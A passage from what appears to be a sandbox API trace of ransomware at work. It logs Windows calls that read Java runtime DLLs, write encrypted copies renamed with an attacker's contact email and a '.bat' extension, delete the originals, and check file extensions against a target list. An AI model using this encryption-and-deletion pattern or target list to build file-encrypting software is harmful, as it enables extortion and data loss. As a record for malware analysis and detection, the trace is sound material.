[0188.762] CloseHandle (hObject=0x390) returned 1 [0188.762] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.762] SetEndOfFile (hFile=0x38c) returned 1 [0188.763] CloseHandle (hObject=0x38c) returned 1 [0188.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0189.506] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\decora_sse.dll")) returned 1 [0189.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.506] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.506] lstrlenW (lpString=".doc") returned 4 [0189.506] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.506] lstrlenW (lpString=".docx") returned 5 [0189.506] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0189.506] lstrlenW (lpString=".pdf") returned 4 [0189.506] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.506] lstrlenW (lpString=".xls") returned 4 [0189.506] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.507] lstrlenW (lpString=".xlsx") returned 5 [0189.507] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0189.507] lstrlenW (lpString=".ppt") returned 4 [0189.507] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.507] lstrlenW (lpString=".zip") returned 4 [0189.507] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.507] lstrlenW (lpString=".rar") returned 4 [0189.507] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.507] lstrlenW (lpString=".bz2") returned 4 [0189.507] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.507] lstrlenW (lpString=".7z") returned 3 [0189.507] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.507] lstrlenW (lpString=".dbf") returned 4 [0189.507] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.507] lstrlenW (lpString=".1cd") returned 4 [0189.507] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.507] lstrlenW (lpString=".jpg") returned 4 [0189.507] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.507] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.507] lstrlenW (lpString=".doc") returned 4 [0189.507] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.507] lstrlenW (lpString=".docx") returned 5 [0189.507] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0189.508] lstrlenW (lpString=".pdf") returned 4 [0189.508] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.508] lstrlenW (lpString=".xls") returned 4 [0189.508] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.508] lstrlenW (lpString=".xlsx") returned 5 [0189.508] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0189.508] lstrlenW (lpString=".ppt") returned 4 [0189.508] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.508] lstrlenW (lpString=".zip") returned 4 [0189.508] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.508] lstrlenW (lpString=".rar") returned 4 [0189.508] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.508] lstrlenW (lpString=".bz2") returned 4 [0189.508] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.508] lstrlenW (lpString=".7z") returned 3 [0189.508] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.508] lstrlenW (lpString=".dbf") returned 4 [0189.508] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.508] lstrlenW (lpString=".1cd") returned 4 [0189.508] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\decora_sse.dll") returned 53 [0189.508] lstrlenW (lpString=".jpg") returned 4 [0189.508] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.509] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0189.509] lstrlenW (lpString="deployJava1.dll") returned 15 [0189.509] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0189.509] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=1026112) returned 1 [0189.509] CloseHandle (hObject=0x38c) returned 1 [0189.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll")) returned 0x20 [0189.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0189.510] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0189.510] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.510] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.510] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0190.874] GetLastError () returned 0x0 [0190.874] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xfa840, lpOverlapped=0x0) returned 1 [0194.400] WriteFile (in: hFile=0x394, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xfa850, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xfa850, lpOverlapped=0x0) returned 1 [0195.865] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.865] WriteFile (in: hFile=0x394, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf2, lpOverlapped=0x0) returned 1 [0195.866] SetEndOfFile (hFile=0x394) returned 1 [0195.866] CloseHandle (hObject=0x394) returned 1 [0195.866] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.866] SetEndOfFile (hFile=0x38c) returned 1 [0195.877] CloseHandle (hObject=0x38c) returned 1 [0195.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0195.877] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll")) returned 1 [0195.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.877] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.877] lstrlenW (lpString=".doc") returned 4 [0195.877] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0195.877] lstrlenW (lpString=".docx") returned 5 [0195.877] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0195.877] lstrlenW (lpString=".pdf") returned 4 [0195.877] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0195.878] lstrlenW (lpString=".xls") returned 4 [0195.878] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0195.878] lstrlenW (lpString=".xlsx") returned 5 [0195.878] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0195.878] lstrlenW (lpString=".ppt") returned 4 [0195.878] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0195.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.878] lstrlenW (lpString=".zip") returned 4 [0195.878] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0195.878] lstrlenW (lpString=".rar") returned 4 [0195.878] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0195.878] lstrlenW (lpString=".bz2") returned 4 [0195.878] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0195.878] lstrlenW (lpString=".7z") returned 3 [0195.878] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0195.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.878] lstrlenW (lpString=".dbf") returned 4 [0195.878] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0195.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.878] lstrlenW (lpString=".1cd") returned 4 [0195.878] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0195.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.878] lstrlenW (lpString=".jpg") returned 4 [0195.878] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0195.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.878] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.878] lstrlenW (lpString=".doc") returned 4 [0195.879] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0195.879] lstrlenW (lpString=".docx") returned 5 [0195.879] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0195.879] lstrlenW (lpString=".pdf") returned 4 [0195.879] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0195.879] lstrlenW (lpString=".xls") returned 4 [0195.879] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0195.879] lstrlenW (lpString=".xlsx") returned 5 [0195.879] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0195.879] lstrlenW (lpString=".ppt") returned 4 [0195.879] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0195.879] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.879] lstrlenW (lpString=".zip") returned 4 [0195.879] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0195.879] lstrlenW (lpString=".rar") returned 4 [0195.879] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0195.879] lstrlenW (lpString=".bz2") returned 4 [0195.879] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0195.879] lstrlenW (lpString=".7z") returned 3 [0195.879] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0195.879] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.879] lstrlenW (lpString=".dbf") returned 4 [0195.879] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0195.879] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.879] lstrlenW (lpString=".1cd") returned 4 [0195.879] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0195.879] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 63 [0195.879] lstrlenW (lpString=".jpg") returned 4 [0195.879] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0195.880] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0195.880] lstrlenW (lpString="glass.dll") returned 9 [0195.880] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0195.880] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=265792) returned 1 [0195.880] CloseHandle (hObject=0x38c) returned 1 [0195.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll")) returned 0x20 [0195.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0195.880] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0195.881] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.881] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.881] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0196.259] GetLastError () returned 0x0 [0196.259] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x40e40, lpOverlapped=0x0) returned 1 [0196.429] WriteFile (in: hFile=0x39c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x40e50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x40e50, lpOverlapped=0x0) returned 1 [0196.434] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.434] WriteFile (in: hFile=0x39c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe6, lpOverlapped=0x0) returned 1 [0196.434] SetEndOfFile (hFile=0x39c) returned 1 [0196.434] CloseHandle (hObject=0x39c) returned 1 [0196.435] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.435] SetEndOfFile (hFile=0x38c) returned 1 [0196.438] CloseHandle (hObject=0x38c) returned 1 [0196.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.438] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll")) returned 1 [0196.438] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.438] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.438] lstrlenW (lpString=".doc") returned 4 [0196.439] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.439] lstrlenW (lpString=".docx") returned 5 [0196.439] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.439] lstrlenW (lpString=".pdf") returned 4 [0196.439] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.439] lstrlenW (lpString=".xls") returned 4 [0196.439] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.439] lstrlenW (lpString=".xlsx") returned 5 [0196.439] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.439] lstrlenW (lpString=".ppt") returned 4 [0196.439] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.439] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.439] lstrlenW (lpString=".zip") returned 4 [0196.439] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.439] lstrlenW (lpString=".rar") returned 4 [0196.439] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.439] lstrlenW (lpString=".bz2") returned 4 [0196.439] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.439] lstrlenW (lpString=".7z") returned 3 [0196.439] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.439] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.439] lstrlenW (lpString=".dbf") returned 4 [0196.439] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.439] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.439] lstrlenW (lpString=".1cd") returned 4 [0196.439] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.439] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.439] lstrlenW (lpString=".jpg") returned 4 [0196.439] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.440] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.440] lstrlenW (lpString=".doc") returned 4 [0196.440] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString=".docx") returned 5 [0196.440] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.440] lstrlenW (lpString=".pdf") returned 4 [0196.440] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString=".xls") returned 4 [0196.440] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString=".xlsx") returned 5 [0196.440] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.440] lstrlenW (lpString=".ppt") returned 4 [0196.440] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.440] lstrlenW (lpString=".zip") returned 4 [0196.440] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString=".rar") returned 4 [0196.440] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.440] lstrlenW (lpString=".bz2") returned 4 [0196.440] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.440] lstrlenW (lpString=".7z") returned 3 [0196.440] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.441] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.441] lstrlenW (lpString=".dbf") returned 4 [0196.441] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.441] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.441] lstrlenW (lpString=".1cd") returned 4 [0196.441] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.441] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0196.441] lstrlenW (lpString=".jpg") returned 4 [0196.441] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.441] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.441] lstrlenW (lpString="j2pkcs11.dll") returned 12 [0196.441] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.441] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=63552) returned 1 [0196.441] CloseHandle (hObject=0x38c) returned 1 [0196.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll")) returned 0x20 [0196.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.442] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.442] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.442] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.442] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0196.443] GetLastError () returned 0x0 [0196.443] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xf840, lpOverlapped=0x0) returned 1 [0196.579] WriteFile (in: hFile=0x39c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf850, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf850, lpOverlapped=0x0) returned 1 [0196.582] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.582] WriteFile (in: hFile=0x39c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.582] SetEndOfFile (hFile=0x39c) returned 1 [0196.582] CloseHandle (hObject=0x39c) returned 1 [0196.582] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.582] SetEndOfFile (hFile=0x38c) returned 1 [0196.584] CloseHandle (hObject=0x38c) returned 1 [0196.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.584] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll")) returned 1 [0196.584] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.584] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 51 [0196.584] lstrlenW (lpString=".doc") returned 4 [0196.584] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.584] lstrlenW (lpString=".docx") returned 5 [0196.584] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0196.585] lstrlenW (lpString=".pdf") returned 4 [0196.585] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.585] lstrlenW (lpString=".xls") returned 4 [0196.585] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.585] lstrlenW (lpString=".xlsx") returned 5 [0196.585] lstrcmpiW (lpString1=".xlsx", 